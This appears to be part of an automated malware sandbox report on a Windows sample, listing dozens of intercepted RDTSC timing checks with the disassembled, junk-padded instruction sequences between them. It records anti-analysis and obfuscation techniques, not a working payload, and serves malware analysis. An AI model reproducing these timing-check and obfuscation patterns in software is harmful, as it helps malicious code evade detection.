                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 753768 second address: 75376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75376E second address: 75377A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75377A second address: 7537C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2ADCE7BD73h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F2ADCE7BD6Eh 0x00000018 pushad 0x00000019 je 00007F2ADCE7BD66h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7537C5 second address: 7537CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7537CB second address: 7537D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523B7 second address: 7523CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B42h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523CD second address: 7523EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2ADCE7BD74h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523EB second address: 7523F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523F6 second address: 75240B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jnc 00007F2ADCE7BD6Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75240B second address: 75242E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F2ADCE78B36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75242E second address: 752432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752432 second address: 752436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75256D second address: 752571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752571 second address: 75259A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F2ADCE78B38h 0x0000000c jmp 00007F2ADCE78B48h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75259A second address: 7525AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F2ADCE7BD66h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7525AC second address: 7525B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7525B4 second address: 7525C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F2ADCE7BD6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7526FA second address: 75270C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F2ADCE78B36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75270C second address: 75272B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2ADCE7BD76h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752878 second address: 75288A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2ADCE78B3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75288A second address: 75289F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE7BD6Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752A03 second address: 752A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752B63 second address: 752B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75618E second address: 7561B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F2ADCE78B47h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7561B8 second address: 7561DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2ADCE7BD66h 0x00000008 jmp 00007F2ADCE7BD6Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F2ADCE7BD66h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7561DB second address: 756201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2ADCE78B43h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 756201 second address: 756207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 76141F second address: 76142D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2ADCE78B36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 76142D second address: 76144B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2ADCE7BD6Fh 0x0000000a jns 00007F2ADCE7BD6Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DA4 second address: 775DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DAA second address: 775DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DAE second address: 775DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DB4 second address: 775DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2ADCE7BD6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 777E41 second address: 777E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7779C2 second address: 7779C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7779C7 second address: 7779D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 777B73 second address: 777B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F2ADCE7BD66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 789F94 second address: 789FAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 789FAC second address: 789FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 789FB4 second address: 789FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78EBA9 second address: 78EBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78EBAD second address: 78EBB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78EBB3 second address: 78EBB8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78DF93 second address: 78DFAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78E68B second address: 78E6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F2ADCE7BD7Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 791AB3 second address: 791B07 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2ADCE78B3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F2ADCE78B38h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dx, B860h 0x00000030 push dword ptr [ebp+122D1C34h] 0x00000036 sub edx, dword ptr [ebp+122D28E8h] 0x0000003c call 00007F2ADCE78B39h 0x00000041 push edi 0x00000042 push edi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 791B07 second address: 791B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F2ADCE7BD74h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 791B2C second address: 791B32 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E10347 second address: 4E103AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2ADCE7BD6Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, C7h 0x00000013 pushfd 0x00000014 jmp 00007F2ADCE7BD6Ah 0x00000019 and esi, 45D6A8C8h 0x0000001f jmp 00007F2ADCE7BD6Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2ADCE7BD75h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E103AD second address: 4E103CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 146Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E103CD second address: 4E103D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E103D2 second address: 4E103D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E103D8 second address: 4E103DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E1043F second address: 4E10445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E10445 second address: 4E1044B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E1044B second address: 4E1044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E3070E second address: 4E30793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2ADCE7BD73h 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F2ADCE7BD72h 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov dl, al 0x00000018 push edi 0x00000019 mov eax, 1BD54B25h 0x0000001e pop eax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 jmp 00007F2ADCE7BD77h 0x00000028 pushfd 0x00000029 jmp 00007F2ADCE7BD78h 0x0000002e and al, FFFFFF98h 0x00000031 jmp 00007F2ADCE7BD6Bh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30793 second address: 4E30799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30799 second address: 4E3079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E3079F second address: 4E307A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E307A3 second address: 4E307C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E307C4 second address: 4E307CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E307CA second address: 4E30840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F2ADCE7BD78h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2ADCE7BD6Eh 0x00000019 sbb eax, 406E80E8h 0x0000001f jmp 00007F2ADCE7BD6Bh 0x00000024 popfd 0x00000025 pushad 0x00000026 mov edi, ecx 0x00000028 call 00007F2ADCE7BD72h 0x0000002d pop esi 0x0000002e popad 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F2ADCE7BD70h 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30840 second address: 4E3086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, di 0x0000000c popad 0x0000000d lea eax, dword ptr [ebp-04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2ADCE78B48h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E3086F second address: 4E30875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30875 second address: 4E30879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30879 second address: 4E3087D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E3087D second address: 4E308FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F2ADCE78B44h 0x00000010 xor eax, 03DAEA68h 0x00000016 jmp 00007F2ADCE78B3Bh 0x0000001b popfd 0x0000001c mov bx, si 0x0000001f popad 0x00000020 mov dword ptr [esp], eax 0x00000023 jmp 00007F2ADCE78B42h 0x00000028 push dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F2ADCE78B3Dh 0x00000033 pushfd 0x00000034 jmp 00007F2ADCE78B40h 0x00000039 sub ch, 00000028h 0x0000003c jmp 00007F2ADCE78B3Bh 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30990 second address: 4E30996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30996 second address: 4E3099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E3099C second address: 4E309A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E309A0 second address: 4E309B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2ADCE78B76h 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E309FE second address: 4E201AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, D0h 0x00000005 pushfd 0x00000006 jmp 00007F2ADCE7BD77h 0x0000000b jmp 00007F2ADCE7BD73h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop esi 0x00000015 jmp 00007F2ADCE7BD76h 0x0000001a leave 0x0000001b jmp 00007F2ADCE7BD70h 0x00000020 retn 0004h 0x00000023 nop 0x00000024 cmp eax, 00000000h 0x00000027 setne al 0x0000002a jmp 00007F2ADCE7BD62h 0x0000002c xor ebx, ebx 0x0000002e test al, 01h 0x00000030 jne 00007F2ADCE7BD67h 0x00000032 sub esp, 04h 0x00000035 mov dword ptr [esp], 0000000Dh 0x0000003c call 00007F2AE17C94ECh 0x00000041 mov edi, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F2ADCE7BD75h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E201AA second address: 4E201BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE78B3Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E201BA second address: 4E20239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2ADCE7BD76h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F2ADCE7BD71h 0x00000018 jmp 00007F2ADCE7BD70h 0x0000001d pop eax 0x0000001e pushfd 0x0000001f jmp 00007F2ADCE7BD6Bh 0x00000024 and cx, D00Eh 0x00000029 jmp 00007F2ADCE7BD79h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20239 second address: 4E2024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2024C second address: 4E20264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE7BD74h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20264 second address: 4E202DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 pushad 0x00000012 mov edx, 27DFFFE2h 0x00000017 movsx edx, cx 0x0000001a popad 0x0000001b popad 0x0000001c sub esp, 2Ch 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F2ADCE78B47h 0x00000026 add cx, 658Eh 0x0000002b jmp 00007F2ADCE78B49h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F2ADCE78B3Eh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d pop ebx 0x0000003e mov edx, ecx 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E202DA second address: 4E202F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A8h 0x00000005 mov dl, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2ADCE7BD72h 0x00000012 rdtsc
